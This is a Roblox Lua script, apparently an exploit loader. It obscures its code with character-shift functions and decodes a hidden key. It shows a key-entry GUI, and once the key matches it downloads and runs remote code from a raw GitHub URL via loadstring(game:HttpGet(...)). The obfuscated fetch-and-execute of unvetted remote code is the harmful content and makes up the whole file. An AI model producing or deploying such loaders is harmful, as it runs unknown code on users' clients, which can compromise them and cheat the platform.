local a1 = string.char
local function a2(s) return (s:gsub(".", function(c) return a1(c:byte() - 5) end)) end
local function a3(s) return (s:gsub(".", function(c) return a1(c:byte() + 5) end)) end

-- Key is encoded
local encodedKey = "\092\076\079\084\086\087\092\062\062\062\062\062\062\079\079\086\087\062\062\086\087"

local function decodeKey()
    return (encodedKey:gsub(".", function(c) return a1(c:byte() - 10) end))
end

local hiddenCode = a3([[
local v0=decodeKey()
local v1=Instance.new("ScreenGui")
v1.Parent=game.Players.LocalPlayer:WaitForChild("PlayerGui")

local v2=Instance.new("TextBox")
v2.Size=UDim2.new(0,200,0,50)
v2.Position=UDim2.new(0.5,-100,0.3,0)
v2.PlaceholderText="Enter Key"
v2.Parent=v1

local v3=Instance.new("TextButton")
v3.Size=UDim2.new(0,200,0,50)
v3.Position=UDim2.new(0.5,-100,0.4,0)
v3.Text="Verify Key"
v3.Parent=v1

v3.MouseButton1Click:Connect(function()
    if v2.Text==v0 then
        v1:Destroy()
        print("Access Granted!") 
        loadstring(game:HttpGet("https://raw.githubusercontent.com/Fiperx/MAIN/main/eyeyey"))()
    else
        v2.Text="Invalid Key"
    end
end)
]])

local function executeHidden()
    loadstring(a2(hiddenCode))()
end

executeHidden()
